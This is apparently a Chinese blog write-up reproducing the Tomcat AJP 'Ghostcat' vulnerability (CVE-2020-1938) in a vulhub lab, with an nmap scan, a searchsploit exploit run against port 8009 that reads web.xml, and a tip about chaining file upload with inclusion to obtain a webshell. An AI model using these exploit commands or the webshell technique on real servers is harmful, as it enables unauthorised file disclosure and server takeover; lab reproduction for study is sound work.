cve-2020-1938/cve-2020-10487

tomcat Ajp漏洞复现(cve-2020-1938/cve-2020-10487)

受影响版本
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
不受影响版本
Apache Tomcat = 7.0.100
Apache Tomcat = 8.5.51
Apache Tomcat = 9.0.31

使用环境:vulhub/tomcat:9.0.30

复现过程

1.启动环境:

docker-compose up -d

2.使用nmap扫描服务器开放的端口

root@kali:~# nmap 192.168.8.134
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-13 23:58 CST
Nmap scan report for root (192.168.8.134)
Host is up (0.0082s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: B8:86:87:37:51:BB (Liteon Technology)

Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds

3.使用poc或者railgun验证漏洞:

  • 使用kali验证漏洞
#使用poc进行验证:multiple/webapps/48143.py
searchspoit Tomcat - AJP 'Ghostcat File Read/Inclusion

#结果:
root@kali:~# python 48143.py -p 8009 -f "/WEB-INF/web.xml" 192.168.8.134
Getting resource at ajp13://192.168.8.134:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to Tomcat
  </description>

</web-app>
  • 使用railgun验证漏洞

image

小技巧:若是服务存在文件上传点,可以通过上传文件再进行文件包含获取webshell

扩展知识点:Apache JServ协议说明

image

posted @ 2022-03-14 01:21  coolcoolha  阅读(292)  评论(0编辑  收藏  举报